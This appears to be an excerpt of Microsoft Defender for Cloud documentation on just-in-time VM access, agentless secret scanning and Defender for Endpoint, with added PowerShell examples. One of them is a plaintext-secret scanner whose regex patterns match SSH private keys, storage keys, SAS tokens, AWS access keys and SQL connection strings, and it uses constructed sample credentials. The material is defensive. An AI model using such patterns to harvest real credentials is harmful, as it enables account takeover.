[Screenshot: the Settings & monitoring page, showing the Vulnerability assessment for machines toggle alongside Endpoint protection and Agentless scanning for machines]

Tip

If you select the "Microsoft Defender for Cloud built-in Qualys solution" solution, Defender for Cloud enables the following policy: Configure machines to receive a vulnerability assessment provider.


5. Select Apply and then select Save. 


6. To view the findings for all supported vulnerability assessment solutions, see the 
Machines should have vulnerability findings resolved recommendation. 


Learn more in View and remediate findings from vulnerability assessment solutions 
on your machines. 


Next steps 


Remediate the discovered vulnerabilities 


Defender for Cloud also offers vulnerability assessment for your: 


• SQL databases - Explore vulnerability assessment reports in the vulnerability assessment dashboard
• Azure Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities
• Amazon AWS Elastic Container Registry images - Use Microsoft Defender for container registries to scan your images for vulnerabilities


Enable just-in-time access on VMs 


Article · 08/27/2023


You can use Microsoft Defender for Cloud's just-in-time (JIT) access to protect your 
Azure virtual machines (VMs) from unauthorized network access. Many times firewalls 
contain allow rules that leave your VMs vulnerable to attack. JIT lets you allow access to 
your VMs only when the access is needed, on the ports needed, and for the period of 
time needed. 


Learn more about how JIT works and the permissions required to configure and use JIT. 
In this article, you learn how to include JIT in your security program, including how to: 


• Enable JIT on your VMs from the Azure portal or programmatically
• Request access to a VM that has JIT enabled from the Azure portal or programmatically
• Audit the JIT activity to make sure your VMs are secured appropriately


Availability 


Aspect                           Details
Release state:                   General availability (GA)
Supported VMs:                   Yes: VMs deployed through Azure Resource Manager
                                 No: VMs deployed with classic deployment models
                                 Yes: VMs protected by Azure Firewalls on the same VNET as the VM
                                 No: VMs protected by Azure Firewalls controlled by Azure Firewall Manager
                                 Yes: AWS EC2 instances (Preview)
Required roles and permissions:  Reader, SecurityReader, or a custom role can view the JIT status and parameters.
                                 To create a least-privileged role for users that only need to request JIT
                                 access to a VM, use the Set-JitLeastPrivilegedRole script.
Clouds:                          Yes: Commercial clouds
                                 Yes: National (Azure Government, Microsoft Azure operated by 21Vianet)
                                 Yes: Connected AWS accounts (preview)


Prerequisites 


• JIT requires Microsoft Defender for Servers Plan 2 to be enabled on the subscription.
• Reader and SecurityReader roles can both view the JIT status and parameters.
• If you want to create custom roles that work with JIT, you need the details from the following table:


To enable a user to:          Permissions to set

Configure or edit a JIT       Assign these actions to the role:
policy for a VM               o On the scope of a subscription or resource group that is associated with the VM:
                                Microsoft.Security/locations/jitNetworkAccessPolicies/write
                              o On the scope of a subscription or resource group of the VM:
                                Microsoft.Compute/virtualMachines/write

Request JIT access to a VM    Assign these actions to the user:
                              o Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action
                              o Microsoft.Security/locations/jitNetworkAccessPolicies/*/read
                              o Microsoft.Compute/virtualMachines/read
                              o Microsoft.Network/networkInterfaces/*/read
                              o Microsoft.Network/publicIPAddresses/read

Read JIT policies             Assign these actions to the user:
                              o Microsoft.Security/locations/jitNetworkAccessPolicies/read
                              o Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action
                              o Microsoft.Security/policies/read
                              o Microsoft.Security/pricings/read
                              o Microsoft.Compute/virtualMachines/read
                              o Microsoft.Network/*/read


Note

Only the Microsoft.Security permissions are relevant for AWS.

• To set up JIT on your Amazon Web Service (AWS) VM, you need to connect your AWS account to Microsoft Defender for Cloud.

Tip

To create a least-privileged role for users that need to request JIT access to a VM, and perform no other JIT operations, use the Set-JitLeastPrivilegedRole script from the Defender for Cloud GitHub community pages.

Note

In order to successfully create a custom JIT policy, the policy name, together with the targeted VM name, must not exceed a total of 56 characters.
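The permissions table above lists the actions a requester-only role needs. As an added example (not Microsoft's Set-JitLeastPrivilegedRole script), this PowerShell creates such a custom role scoped to one subscription using only those actions; the subscription ID and role name are constructed placeholders, and it assumes Az.Resources is installed and you are signed in with rights to create role definitions.

```powershell
# Added example: least-privileged custom role for users who only request JIT access.
# Assumes Az.Resources and an active Connect-AzAccount session with Owner or
# User Access Administrator rights at the subscription scope.
$subscriptionId = '00000000-0000-0000-0000-000000000000'   # constructed placeholder
$roleName       = 'JIT VM Access Requester (custom)'       # constructed name

# Exactly the "Request JIT access to a VM" actions from the table above: nothing that
# lets the holder write or delete a JIT policy, or modify the VM itself.
$requesterActions = @(
    'Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action',
    'Microsoft.Security/locations/jitNetworkAccessPolicies/*/read',
    'Microsoft.Compute/virtualMachines/read',
    'Microsoft.Network/networkInterfaces/*/read',
    'Microsoft.Network/publicIPAddresses/read'
)

function New-JitRequesterRole {
    param(
        [Parameter(Mandatory)][string]$SubscriptionId,
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string[]]$Actions
    )
    # Refuse to create a second role with the same name; update the existing one instead.
    $existing = Get-AzRoleDefinition -Name $Name -ErrorAction SilentlyContinue
    if ($existing) {
        throw "Role '$Name' already exists (Id $($existing.Id)); use Set-AzRoleDefinition to change it."
    }
    # Clone the built-in Reader definition as a template and replace its contents,
    # the pattern Azure's custom-role documentation uses with New-AzRoleDefinition.
    $role = Get-AzRoleDefinition -Name 'Reader'
    $role.Id = $null
    $role.Name = $Name
    $role.Description = 'Can request just-in-time access to VMs; cannot configure JIT policies.'
    $role.IsCustom = $true
    $role.Actions.Clear()
    foreach ($a in $Actions) { $role.Actions.Add($a) }
    $role.AssignableScopes.Clear()
    $role.AssignableScopes.Add("/subscriptions/$SubscriptionId")
    New-AzRoleDefinition -Role $role
}

$role = New-JitRequesterRole -SubscriptionId $subscriptionId -Name $roleName -Actions $requesterActions

# Sanity check before assigning: the role must not carry the JIT policy write action.
$writeActions = $role.Actions | Where-Object { $_ -like 'Microsoft.Security/locations/jitNetworkAccessPolicies/write' }
if ($writeActions) { throw 'Role unexpectedly grants JIT policy write; review before assigning.' }
"Created role '$($role.Name)' with Id $($role.Id)"
```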


Work with JIT VM access using Microsoft 
Defender for Cloud 


You can use Defender for Cloud or you can programmatically enable JIT VM access with your own custom options, or you can enable JIT with default, hard-coded parameters from Azure virtual machines.

Just-in-time VM access shows your VMs grouped into:

• Configured - VMs configured to support just-in-time VM access, and shows:
  o the number of approved JIT requests in the last seven days
  o the last access date and time
  o the connection details configured
  o the last user
• Not configured - VMs without JIT enabled, but that can support JIT. We recommend that you enable JIT for these VMs.
• Unsupported - VMs that don't support JIT because:
  o Missing network security group (NSG) or Azure Firewall - JIT requires an NSG to be configured or a Firewall configuration (or both)
  o Classic VM - JIT supports VMs that are deployed through Azure Resource Manager. Learn more about classic vs Azure Resource Manager deployment models.
  o Other - The JIT solution is disabled in the security policy of the subscription or the resource group.


Enable JIT on your VMs from Microsoft Defender for 
Cloud 


[Screenshot: the Just-in-time VM access page under Workload protections, with the Configured, Not Configured and Unsupported tabs and the columns Virtual machine, Approved, Last access, Connection details and Last user]


From Defender for Cloud, you can enable and configure the JIT VM access. 


1. Open the Workload protections and, in the advanced protections, select Just-in- 
time VM access. 


2. In the Not configured virtual machines tab, mark the VMs to protect with JIT and 
select Enable JIT on VMs. 


The JIT VM access page opens listing the ports that Defender for Cloud 
recommends protecting: 


22 - SSH
3389 - RDP
5985 - WinRM
5986 - WinRM


To customize the JIT access: 
a. Select Add. 


b. Select one of the ports in the list to edit it or enter other ports. For each port, 
you can set the: 


• Protocol - The protocol that is allowed on this port when a request is approved
• Allowed source IPs - The IP ranges that are allowed on this port when a request is approved
• Maximum request time - The maximum time window during which a specific port can be opened


c. Select OK. 


3. To save the port configuration, select Save. 


Edit the JIT configuration on a JIT-enabled VM using 
Defender for Cloud 


You can modify a VM's just-in-time configuration by adding and configuring a new port 
to protect for that VM, or by changing any other setting related to an already protected 
port. 


To edit the existing JIT rules for a VM: 


1. Open the Workload protections and, in the advanced protections, select Just-in-time VM access.
2. In the Configured virtual machines tab, right-click on a VM and select Edit.
3. In the JIT VM access configuration, you can either edit the list of ports or select Add a new custom port.


4. When you finish editing the ports, select Save. 


Request access to a JIT-enabled VM from Microsoft 
Defender for Cloud 


When a VM has JIT enabled, you have to request access to connect to it. You can request access in any of the supported ways, regardless of how you enabled JIT.


1. From the Just-in-time VM access page, select the Configured tab. 
2. Select the VMs you want to access: 


• The icon in the Connection Details column indicates whether JIT is enabled on the network security group or firewall. If it's enabled on both, only the firewall icon appears.
• The Connection Details column shows the user and ports that can access the VM.


3. Select Request access. The Request access window opens. 


4. Under Request access, select the ports that you want to open for each VM, the source IP addresses that you want the port opened on, and the time window to open the ports.

5. Select Open ports.

Note

If a user who is requesting access is behind a proxy, you can enter the IP address range of the proxy.


Other ways to work with JIT VM access 
Azure virtual machines 


Enable JIT on your VMs from Azure virtual machines 


You can enable JIT on a VM from the Azure virtual machines pages of the Azure portal. 


Tip

If a VM already has JIT enabled, the VM configuration page shows that JIT is enabled. You can use the link to open the JIT VM access page in Defender for Cloud to view and change the settings.

1. From the Azure portal, search for and select Virtual machines.
2. Select the virtual machine you want to protect with JIT.
3. In the menu, select Configuration.
4. Under Just-in-time access, select Enable just-in-time.

By default, just-in-time access for the VM uses these settings:

• Windows machines
  o RDP port: 3389
  o Maximum allowed access: Three hours
  o Allowed source IP addresses: Any
• Linux machines
  o SSH port: 22
  o Maximum allowed access: Three hours
  o Allowed source IP addresses: Any


5. To edit any of these values or add more ports to your JIT configuration, use 
Microsoft Defender for Cloud's just-in-time page: 


a. From Defender for Cloud's menu, select Just-in-time VM access. 


b. From the Configured tab, right-click on the VM to which you want to add a 
port, and select Edit. 


[Screenshot: the Configured tab of the Just-in-time VM access page, with a VM's right-click context menu open]


c. Under JIT VM access configuration, you can either edit the existing settings of 
an already protected port or add a new custom port. 


d. When you've finished editing the ports, select Save. 


Request access to a JIT-enabled VM from the Azure virtual 
machine's connect page 


When a VM has JIT enabled, you have to request access to connect to it. You can request access in any of the supported ways, regardless of how you enabled JIT.

[Screenshot: a virtual machine's Connect page in the Azure portal, showing the banner "This VM has a just-in-time access policy. Select 'Request access' before connecting.", the RDP / SSH / BASTION tabs, the Source IP selector (My IP / All configured IPs) and the Request access button]


To request access from Azure virtual machines: 


1. In the Azure portal, open the virtual machines pages. 


2. Select the VM to which you want to connect, and open the Connect page. 


Azure checks to see if JIT is enabled on that VM.

• If JIT isn't enabled for the VM, you're prompted to enable it.
• If JIT is enabled, select Request access to pass an access request with the requesting IP, time range, and ports that were configured for that VM.

Note

After a request is approved for a VM protected by Azure Firewall, Defender for Cloud provides the user with the proper connection details (the port mapping from the DNAT table) to use to connect to the VM.


PowerShell 


Enable JIT on your VMs using PowerShell 


To enable just-in-time VM access from PowerShell, use the official Microsoft Defender 
for Cloud PowerShell cmdlet Set-AzJitNetworkAccessPolicy. 


Example - Enable just-in-time VM access on a specific VM with the following rules: 


• Close ports 22 and 3389
• Set a maximum time window of 3 hours for each so they can be opened per approved request
• Allow the user who is requesting access to control the source IP addresses
• Allow the user who is requesting access to establish a successful session upon an approved just-in-time access request

The following PowerShell commands create this JIT configuration:

1. Assign a variable that holds the just-in-time VM access rules for a VM:

Azure PowerShell

$JitPolicy = (@{
    id="/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/providers/Microsoft.Compute/virtualMachines/VMNAME";
    ports=(@{
        number=22;
        protocol="*";
        allowedSourceAddressPrefix=@("*");
        maxRequestAccessDuration="PT3H"},
        @{
        number=3389;
        protocol="*";
        allowedSourceAddressPrefix=@("*");
        maxRequestAccessDuration="PT3H"})})

2. Insert the VM just-in-time VM access rules into an array:

Azure PowerShell

$JitPolicyArr=@($JitPolicy)

3. Configure the just-in-time VM access rules on the selected VM:

Azure PowerShell

Set-AzJitNetworkAccessPolicy -Kind "Basic" -Location "LOCATION" -Name "default" -ResourceGroupName "RESOURCEGROUP" -VirtualMachine $JitPolicyArr

Use the -Name parameter to specify a VM. For example, to establish the JIT configuration for two different VMs, VM1 and VM2, use: Set-AzJitNetworkAccessPolicy -Name VM1 and Set-AzJitNetworkAccessPolicy -Name VM2.


Request access to a JIT-enabled VM using PowerShell 


In the following example, you can see a just-in-time VM access request to a specific VM 
for port 22, for a specific IP address, and for a specific amount of time: 


Run the following commands in PowerShell: 
1. Configure the VM request access properties: 
Azure PowerShell

$JitPolicyVm1 = (@{
    # Resource ID of the VM you want to reach
    id="/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/providers/Microsoft.Compute/virtualMachines/VMNAME";
    ports=(@{
        number=22;                                      # port to open for this request
        endTimeUtc="2020-07-15T17:00:00.3658798Z";      # when the port closes again (UTC, ISO 8601)
        allowedSourceAddressPrefix=@("IPV4ADDRESS")})}) # only this source address may connect


2. Insert the VM access request parameters in an array: 
Azure PowerShell 


$JitPolicyArr=@($JitPolicyVm1) 


3. Send the access request (use the resource ID from step 1):
Azure PowerShell

Start-AzJitNetworkAccessPolicy -ResourceId "/subscriptions/SUBSCRIPTIONID/resourceGroups/RESOURCEGROUP/providers/Microsoft.Security/locations/LOCATION/jitNetworkAccessPolicies/default" -VirtualMachine $JitPolicyArr


Learn more in the PowerShell cmdlet documentation. 
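The enable and request steps above, combined into one script as an added example; this is not code from the Microsoft documentation. It assumes the Az.Security module and a signed-in session (Connect-AzAccount); every parameter is a placeholder you supply, and the property names used to read the policy back (Requests, VirtualMachines, Ports, Requestor) are assumed from the cmdlet's output objects. The access request limits the source to a single address and computes the end time from the clock instead of hard-coding it, which is the least-privilege shape a JIT request should have.

```powershell
# Added example, not code from the Microsoft documentation. Requires the Az.Security module
# and a signed-in session (Connect-AzAccount). All parameters are placeholders you supply.
param(
    [Parameter(Mandatory)] [string] $SubscriptionId,
    [Parameter(Mandatory)] [string] $ResourceGroup,
    [Parameter(Mandatory)] [string] $Location,
    [Parameter(Mandatory)] [string] $VmName,
    [Parameter(Mandatory)] [string] $RequesterIp     # the single public IPv4 address that may connect
)

$vmId     = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.Compute/virtualMachines/$VmName"
$policyId = "/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.Security/locations/$Location/jitNetworkAccessPolicies/default"

# One rule per port: closed by default, at most 3 hours per approved request (ISO 8601 "PT3H").
# allowedSourceAddressPrefix "*" in the POLICY means the requester picks the source at request
# time; it does not open the port to everyone.
function New-JitPortRule([int] $Port) {
    @{
        number                     = $Port
        protocol                   = "*"
        allowedSourceAddressPrefix = @("*")
        maxRequestAccessDuration   = "PT3H"
    }
}

# Steps 1-3 of the article: put SSH (22) and RDP (3389) on this VM behind JIT.
$policy = @{ id = $vmId; ports = @((New-JitPortRule 22), (New-JitPortRule 3389)) }
Set-AzJitNetworkAccessPolicy -Kind "Basic" -Location $Location -Name "default" `
    -ResourceGroupName $ResourceGroup -VirtualMachine @($policy) | Out-Null

# Request access to port 22 only, from one address, expiring 3 hours from now.
# "o" formats a UTC DateTime as ISO 8601 with a trailing Z, the form the cmdlet expects.
$endTimeUtc = (Get-Date).ToUniversalTime().AddHours(3).ToString("o")
$request = @{
    id    = $vmId
    ports = @(@{
        number                     = 22
        endTimeUtc                 = $endTimeUtc
        allowedSourceAddressPrefix = @($RequesterIp)
    })
}
Start-AzJitNetworkAccessPolicy -ResourceId $policyId -VirtualMachine @($request) | Out-Null

# Read the policy back. Requests holds the access requests made against it; each lists the VM,
# port, allowed source and end time, so you can confirm exactly what is open and until when.
# (Property names Requests/VirtualMachines/Ports/Requestor are assumed from the Az.Security objects.)
$current = Get-AzJitNetworkAccessPolicy -ResourceGroupName $ResourceGroup -Location $Location -Name "default"
foreach ($req in $current.Requests) {
    foreach ($vm in $req.VirtualMachines) {
        foreach ($port in $vm.Ports) {
            [pscustomobject]@{
                Requestor  = $req.Requestor
                Port       = $port.Number
                Source     = $port.AllowedSourceAddressPrefix
                EndTimeUtc = $port.EndTimeUtc
                Status     = $port.Status
            }
        }
    }
}
```

Run it as a file (for example .\Enable-JitAndRequest.ps1 -SubscriptionId ... -RequesterIp 203.0.113.10, using a documentation address here). The final table is the check worth keeping in a runbook: if a port shows a source of "*" or an end time further out than the policy's maximum, the request did not get the narrowing you intended.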


REST API 


Enable JIT on your VMs using the REST API 


The just-in-time VM access feature can be used via the Microsoft Defender for Cloud API. Use this API to get information about configured VMs, add new ones, request access to a VM, and more.


Learn more at JIT network access policies. 


Request access to a JIT-enabled VM using the REST API 


The just-in-time VM access feature can be used via the Microsoft Defender for Cloud 
API. Use this API to get information about configured VMs, add new ones, request 
access to a VM, and more. 


Learn more at JIT network access policies. 


Audit JIT access activity in Defender for Cloud 


You can gain insights into VM activities using log search. To view the logs: 
1. From Just-in-time VM access, select the Configured tab. 
2. For the VM that you want to audit, open the ellipsis menu at the end of the row. 
3. Select Activity Log from the menu. 


The activity log provides a filtered view of previous operations for that VM along with time, date, and subscription.


4. To download the log information, select Download as CSV. 
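The same audit trail the portal shows, pulled from the Azure Activity Log with Az.Monitor, as an added example that is not code from the Microsoft documentation. It assumes a signed-in Az session; that JIT operations are logged against the jitNetworkAccessPolicies resource under the RBAC action names Microsoft.Security/locations/jitNetworkAccessPolicies/write, .../initiate/action and .../delete; and that Get-AzActivityLog exposes the action as Authorization.Action. The function name Get-JitAuditEvents, RESOURCEGROUP and LOCATION are placeholders, and the requester allow-list is constructed.

```powershell
# Added example, not code from the Microsoft documentation. Requires Az.Accounts and Az.Monitor
# and a signed-in session (Connect-AzAccount).
function Get-JitAuditEvents {
    param(
        [Parameter(Mandatory)] [string] $ResourceGroup,
        [Parameter(Mandatory)] [string] $Location,
        [int] $Days = 7
    )
    # The JIT policy is a Microsoft.Security resource in the region, not the VM itself
    # (assumption: JIT operations are logged against this resource ID).
    $subscriptionId = (Get-AzContext).Subscription.Id
    $policyId = "/subscriptions/$subscriptionId/resourceGroups/$ResourceGroup/providers/Microsoft.Security/locations/$Location/jitNetworkAccessPolicies/default"

    # RBAC actions of interest (assumed names, as used in Azure role definitions):
    #   .../write            policy created or changed (who enabled JIT, which ports)
    #   .../initiate/action  an access request (who opened a port, and when)
    #   .../delete           policy removed (ports fall back to the NSG rules)
    $actions = @(
        'Microsoft.Security/locations/jitNetworkAccessPolicies/write',
        'Microsoft.Security/locations/jitNetworkAccessPolicies/initiate/action',
        'Microsoft.Security/locations/jitNetworkAccessPolicies/delete'
    )

    Get-AzActivityLog -ResourceId $policyId -StartTime (Get-Date).AddDays(-$Days) -MaxRecord 1000 |
        Where-Object { $actions -contains $_.Authorization.Action } |
        Select-Object EventTimestamp, Caller,
            @{ n = 'Action'; e = { $_.Authorization.Action } },
            Status, SubStatus |
        Sort-Object EventTimestamp -Descending
}

# Review the last 30 days and keep a copy, as the portal's "Download as CSV" does.
$events = Get-JitAuditEvents -ResourceGroup 'RESOURCEGROUP' -Location 'LOCATION' -Days 30
$events | Format-Table -AutoSize
$events | Export-Csv -Path '.\jit-activity.csv' -NoTypeInformation

# Flag access requests from callers outside the expected group (constructed allow-list).
$expectedRequesters = @('alice@contoso.example', 'bob@contoso.example')
$events | Where-Object { $_.Action -like '*/initiate/action' -and $expectedRequesters -notcontains $_.Caller }
```

The Activity Log is retained for 90 days; to audit JIT requests over a longer window, route it to a Log Analytics workspace with a diagnostic setting and run the same filter there.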


Next steps 


In this article, you learned how to configure and use just-in-time VM access. To learn 
why you should use JIT, read the article that explains the threats JIT defends against: 


JIT explained 


Manage secrets with agentless secret 
scanning (preview) 


Article • 08/15/2023


Attackers can move laterally across networks, find sensitive data, and exploit 
vulnerabilities to damage critical information systems by accessing internet-facing 
workloads and exploiting exposed credentials and secrets. 


Defender for Cloud's agentless secret scanning for Virtual Machines (VM) locates plaintext secrets that exist in your environment. If secrets are detected, Defender for Cloud can assist your security team to prioritize and take actionable remediation steps to minimize the risk of lateral movement, all without affecting your machine's performance.


By using agentless secret scanning, you can proactively discover the following types of 
secrets across your environments: 


• Insecure SSH private keys (Azure, AWS, GCP) - supports the RSA algorithm for PuTTY files, and the PKCS#8 and PKCS#1 standards

• Plaintext Azure SQL connection strings (Azure, AWS) - supports SQL PaaS

• Plaintext Azure storage account connection strings (Azure, AWS)

• Plaintext Azure storage account SAS tokens (Azure, AWS)

• Plaintext AWS access keys (Azure, AWS)

• Plaintext AWS RDS SQL connection strings (Azure, AWS) - supports SQL PaaS


In addition to detecting SSH private keys, the agentless scanner verifies whether they 
can be used to move laterally in the network. Keys that we didn't successfully verify are 
categorized as unverified in the Recommendation pane. 
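A small pre-deployment check for the same classes of plaintext secret listed above, as an added example; it is not Defender for Cloud's scanner or its rules, and the regular expressions are my own approximations of each format (PEM and PuTTY key headers, AccountKey= in a storage connection string, the sv=/se=/sig= trio of a SAS token, the AKIA prefix of an AWS access key ID, and Password= in an Azure SQL or RDS connection string). It reports matches by file, line and type only, never by value. The function name Find-PlaintextSecrets and the sample files are constructed; the sample key ID is AWS's published example value, not a real credential.

```powershell
# Added example, not from the Microsoft documentation and not Defender's detection rules.
# Pattern details are assumptions about each secret format. Output is redacted by design.
$SecretPatterns = [ordered]@{
    # PKCS#1 ("BEGIN RSA PRIVATE KEY"), PKCS#8 ("BEGIN PRIVATE KEY") and OpenSSH PEM headers
    'SSH private key (PEM)'           = '-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----'
    # PuTTY .ppk files start with a versioned header line
    'SSH private key (PuTTY)'         = '^PuTTY-User-Key-File-\d+:'
    # Azure storage connection string carries the account key inline
    'Azure storage connection string' = 'AccountName=[^;\s]+;AccountKey=[A-Za-z0-9+/=]{20,}'
    # SAS token: signed version, expiry and signature query parameters on one line
    'Azure storage SAS token'         = '(?=.*\bsv=\d{4}-\d{2}-\d{2})(?=.*\bse=)(?=.*\bsig=[A-Za-z0-9%+/=]{20,})'
    # AWS access key ID; the secret access key usually sits next to it
    'AWS access key'                  = '(?<![A-Z0-9])AKIA[0-9A-Z]{16}(?![A-Z0-9])'
    # Azure SQL or AWS RDS connection string with an inline password
    'SQL connection string'           = '(database\.windows\.net|rds\.amazonaws\.com)[^\r\n]*Password=[^;\s]+'
}

function Find-PlaintextSecrets {
    param([Parameter(Mandatory)] [string] $Path)
    Get-ChildItem -Path $Path -Recurse -File | ForEach-Object {
        $file = $_
        $lineNo = 0
        foreach ($line in [System.IO.File]::ReadLines($file.FullName)) {
            $lineNo++
            foreach ($entry in $SecretPatterns.GetEnumerator()) {
                if ($line -match $entry.Value) {
                    [pscustomobject]@{
                        File    = $file.FullName
                        Line    = $lineNo
                        Type    = $entry.Key
                        # Redacted context: the first 12 characters of the line, never the secret
                        Context = $line.Substring(0, [Math]::Min(12, $line.Length)) + '...'
                    }
                }
            }
        }
    }
}

# Constructed sample input (no real credentials): a throwaway directory, one file per case.
$sample = Join-Path ([System.IO.Path]::GetTempPath()) ("secret-check-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path $sample | Out-Null
Set-Content -Path (Join-Path $sample 'id_rsa') -Value @(
    '-----BEGIN RSA PRIVATE KEY-----', 'MIIEowIBAAKCAQEA...(truncated sample)...', '-----END RSA PRIVATE KEY-----')
Set-Content -Path (Join-Path $sample 'key.ppk') -Value 'PuTTY-User-Key-File-3: ssh-rsa'
Set-Content -Path (Join-Path $sample 'app.config') -Value @(
    'StorageConnection=DefaultEndpointsProtocol=https;AccountName=contosostore;AccountKey=' + ('A' * 64) + ';EndpointSuffix=core.windows.net',
    'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE',
    'Server=tcp:contoso.database.windows.net,1433;User ID=app;Password=P@ssw0rd-sample;',
    'https://contosostore.blob.core.windows.net/backups?sv=2022-11-02&ss=b&srt=sco&sp=rl&se=2024-12-31T00:00:00Z&sig=' + ('B' * 44))
Set-Content -Path (Join-Path $sample 'readme.txt') -Value 'No secrets here; just text.'

# Expected: six findings (PEM key, PuTTY key, storage connection string, AWS key, SQL string, SAS token).
Find-PlaintextSecrets -Path $sample | Format-Table -AutoSize
Remove-Item -Recurse -Force $sample
```

Point Find-PlaintextSecrets at an image build directory or a configuration repository before it reaches a VM; anything it reports is exactly what the agentless scanner would later surface as a finding, and the Context column is deliberately too short to leak the secret into build logs.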


Prerequisites 


• An Azure account. If you don't already have an Azure account, you can create your Azure free account today.

• Access to Defender for Cloud

• Enable either or both of the following two plans:
  ◦ Defender for Servers Plan 2
  ◦ Defender CSPM

• Enable agentless scanning for machines.


For requirements for agentless scanning, see Learn about agentless scanning. 


Remediate secrets with attack path 


Attack path analysis is a graph-based algorithm that scans your cloud security graph. 
These scans expose exploitable paths that attackers may use to breach your 
environment to reach your high-impact assets. Attack path analysis exposes attack paths 
and suggests recommendations as to how best remediate issues that break the attack 
path and prevent successful breach. 


Attack path analysis takes into account the contextual information of your environment 
to identify issues that may compromise it. This analysis helps prioritize the riskiest issues 
for faster remediation. 


The attack path page shows an overview of your attack paths, affected resources and a 
list of active attack paths. 


Azure VM supported attack path scenarios 


Agentless secret scanning for Azure VMs supports the following attack path scenarios: 


• Exposed Vulnerable VM has an insecure SSH private key that is used to authenticate to a VM.

• Exposed Vulnerable VM has insecure secrets that are used to authenticate to a storage account.

• Vulnerable VM has insecure secrets that are used to authenticate to a storage account.

• Exposed Vulnerable VM has insecure secrets that are used to authenticate to an SQL server.


AWS instances supported attack path scenarios 


Agentless secret scanning for AWS instances supports the following attack path scenarios:

• Exposed Vulnerable EC2 instance has an insecure SSH private key that is used to authenticate to an EC2 instance.

• Exposed Vulnerable EC2 instance has insecure secrets that are used to authenticate to a storage account.

• Exposed Vulnerable EC2 instance has insecure secrets that are used to authenticate to an AWS RDS server.

• Vulnerable EC2 instance has insecure secrets that are used to authenticate to an AWS RDS server.


GCP instances supported attack path scenarios 


Agentless secret scanning for GCP VM instances supports the following attack path scenarios:

• Exposed Vulnerable GCP VM instance has an insecure SSH private key that is used to authenticate to a GCP VM instance.

To investigate secrets with Attack path:
1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Recommendations > Attack path.
3. Select the relevant attack path.
4. Follow the remediation steps to remediate the attack path.




Remediate secrets with recommendations 


If a secret is found on your resource, that resource triggers an affiliated recommendation that is located under the Remediate vulnerabilities security control on the recommendations page. Depending on your resources, one or more of the following recommendations appear:

• Azure resources: Machines should have secrets findings resolved
• AWS resources: EC2 instances should have secret findings resolved
• GCP resources: VM instances should have secret findings resolved
To remediate secrets from the recommendations page: 
1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Recommendations.
3. Expand the Remediate vulnerabilities security control.
4. Select either:
   • Azure resources: Machines should have secrets findings resolved
   • AWS resources: EC2 instances should have secret findings resolved
   • GCP resources: VM instances should have secret findings resolved


5. Expand Affected resources to review the list of all resources that contain secrets. 


6. In the Findings section, select a secret to view detailed information about the 
secret. 


7. Expand Remediation steps and follow the listed steps. 
8. Expand Affected resources to review the resources affected by this secret. 
9. (Optional) You can select an affected resource to see that resource's information.


Secrets that don't have a known attack path are referred to as secrets without an identified target resource.


Remediate secrets with cloud security explorer 


The cloud security explorer enables you to proactively identify potential security risks within your cloud environment. It does so by querying the cloud security graph, which is the context engine of Defender for Cloud. The cloud security explorer allows your security team to prioritize any concerns, while also considering the specific context and conventions of your organization.

To remediate secrets with cloud security explorer: 
1. Sign in to the Azure portal.
2. Navigate to Microsoft Defender for Cloud > Cloud Security Explorer.
3. Select one of the following templates:

   • VM with plaintext secret that can authenticate to another VM - Returns all Azure VMs, AWS EC2 instances, or GCP VM instances with plaintext secret that can access other VMs or EC2s.

   • VM with plaintext secret that can authenticate to a storage account - Returns all Azure VMs, AWS EC2 instances, or GCP VM instances with plaintext secret that can access storage accounts.

   • VM with plaintext secret that can authenticate to a SQL database - Returns all Azure VMs, AWS EC2 instances, or GCP VM instances with plaintext secret that can access SQL databases.


If you don't want to use any of the available templates, you can also build your own query on the cloud security explorer.


Remediate secrets from your asset inventory 


Your asset inventory shows the security posture of the resources you've connected to 
Defender for Cloud. Defender for Cloud periodically analyzes the security state of 
resources connected to your subscriptions to identify potential security issues and 
provides you with active recommendations. 


The asset inventory allows you to view the secrets discovered on a specific machine. 
To remediate secrets from your asset inventory: 

1. Sign in to the Azure portal.

2. Navigate to Microsoft Defender for Cloud > Inventory. 

3. Select the relevant VM. 

4. Go to the Secrets tab. 

5. Review each plaintext secret that appears with the relevant metadata. 

6. Select a secret to view extra details of that secret. 


Different types of secrets have different sets of additional information. For example, for plaintext SSH private keys, the information includes related public keys (mapping between the private key and the authorized_keys file we discovered, or mapping to a different virtual machine that contains the same SSH private key identifier).


Next steps 


• Use asset inventory to manage your resources' security posture


Protect your endpoints with Defender 
for Cloud's integrated EDR solution: 
Microsoft Defender for Endpoint 


Article • 07/20/2023


With Microsoft Defender for Servers, you gain access to and can deploy Microsoft 
Defender for Endpoint to your server resources. Microsoft Defender for Endpoint is a 
holistic, cloud-delivered, endpoint security solution. The main features include: 


• Risk-based vulnerability management and assessment
• Attack surface reduction
• Behavior-based and cloud-powered protection
• Endpoint detection and response (EDR)
• Automatic investigation and remediation
• Managed hunting services


You can learn about Defender for Cloud's integration with Microsoft Defender for 
Endpoint by watching this video from the Defender for Cloud in the Field video series: 
Defender for Servers integration with Microsoft Defender for Endpoint 


For more information about migrating servers from Defender for Endpoint to Defender 
for Cloud, see the Microsoft Defender for Endpoint to Microsoft Defender for Cloud 
Migration Guide. 


Availability 


Aspect                          Details
Release state:                  General availability (GA)
Pricing:                        Requires Microsoft Defender for Servers Plan 1 or Plan 2
Supported environments:         ✔ Azure Arc-enabled machines running Windows/Linux
                                ✔ Azure VMs running Linux (supported versions)
                                ✔ Azure VMs running Windows Server 2022, 2019, 2016, 2012 R2, 2008 R2 SP1, Windows 10/11 Enterprise multi-session (formerly Enterprise for Virtual Desktops)
                                ✖ Azure VMs running Windows 10 or Windows 11 (except if running Windows 10/11 Enterprise multi-session)
Required roles and permissions: - To enable/disable the integration: Security admin or Owner
